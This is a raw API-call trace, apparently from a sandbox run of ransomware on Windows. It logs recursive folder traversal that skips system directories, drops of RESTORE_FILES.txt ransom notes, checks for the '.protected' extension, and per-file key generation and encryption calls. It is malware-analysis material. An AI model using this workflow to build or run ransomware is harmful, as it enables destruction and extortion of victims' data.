1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt") returned 87 [0093.282] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.282] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.282] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.282] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.283] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt") returned 87 [0093.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\store\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.283] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.283] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.283] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt") returned 81 [0093.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.283] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.283] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt") returned 73 [0093.283] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.283] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.283] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.283] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt") returned 73 [0093.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.284] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="Windows") returned -1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="Program Files") returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="Program Files (x86)") returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="$Recycle.bin") returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="System Volume Information") returned -1 [0093.284] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned 57 [0093.284] lstrcmpW (lpString1="Support", lpString2=".") returned 1 [0093.284] lstrcmpW (lpString1="Support", lpString2="..") returned 1 [0093.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*") returned 59 [0093.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\.") returned 59 [0093.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.284] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.285] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.285] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.285] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.285] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.285] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\..") returned 60 [0093.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="Windows") returned -1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="Program Files") returned -1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="Program Files (x86)") returned -1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="$Recycle.bin") returned 1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="System Volume Information") returned -1 [0093.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.protected") returned 93 [0093.285] StrStrIW (lpFirst="MPLog-07132009-221054.log.protected", lpSrch=".protected") returned=".protected" [0093.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt") returned 75 [0093.285] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.285] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.285] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.286] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt") returned 75 [0093.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.286] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.286] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.286] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\RESTORE_FILES.txt") returned 67 [0093.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.287] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="Windows") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files (x86)") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="$Recycle.bin") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="System Volume Information") returned 1 [0093.287] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned 43 [0093.287] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0093.287] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0093.287] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*") returned 45 [0093.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.287] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.287] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.287] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.287] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.287] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.287] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\.") returned 45 [0093.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.287] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.287] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.287] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.288] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.288] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.288] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.288] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\..") returned 46 [0093.288] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.288] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.288] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="Windows") returned -1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="Program Files") returned -1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="Program Files (x86)") returned -1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="$Recycle.bin") returned 1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="System Volume Information") returned -1 [0093.288] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned 49 [0093.288] lstrcmpW (lpString1="MSFax", lpString2=".") returned 1 [0093.288] lstrcmpW (lpString1="MSFax", lpString2="..") returned 1 [0093.288] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*") returned 51 [0093.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.288] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.288] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.288] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.288] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.288] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.288] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\.") returned 51 [0093.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.289] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.289] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.289] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.289] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.289] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.289] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.289] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\..") returned 52 [0093.289] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.289] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="Windows") returned -1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files") returned -1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files (x86)") returned -1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="$Recycle.bin") returned 1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="System Volume Information") returned -1 [0093.289] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 61 [0093.289] lstrcmpW (lpString1="ActivityLog", lpString2=".") returned 1 [0093.289] lstrcmpW (lpString1="ActivityLog", lpString2="..") returned 1 [0093.289] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned 63 [0093.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.289] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.289] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.289] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.289] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.289] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.289] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\.") returned 63 [0093.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.289] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.290] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.290] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.290] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\..") returned 64 [0093.290] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.290] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.290] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt") returned 79 [0093.290] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.290] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.290] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.290] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt") returned 79 [0093.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\activitylog\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.290] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files") returned -1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files (x86)") returned -1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 67 [0093.290] lstrcmpW (lpString1="Common Coverpages", lpString2=".") returned 1 [0093.290] lstrcmpW (lpString1="Common Coverpages", lpString2="..") returned 1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned 69 [0093.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.290] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.290] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.290] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\.") returned 69 [0093.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\..") returned 70 [0093.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 73 [0093.291] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.291] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned 75 [0093.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.291] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\.") returned 75 [0093.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.291] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\..") returned 76 [0093.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.292] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="Windows") returned -1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files") returned -1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files (x86)") returned -1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="$Recycle.bin") returned 1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="System Volume Information") returned -1 [0093.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 87 [0093.292] StrStrIW (lpFirst="confident.cov", lpSrch=".protected") returned 0x0 [0093.292] lstrcmpW (lpString1="confident.cov", lpString2="RESTORE_FILES.txt") returned -1 [0093.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.292] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.292] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="Windows") returned -1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files") returned -1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files (x86)") returned -1 [0093.292] lstrcmpiW (lpString1="fyi.cov", 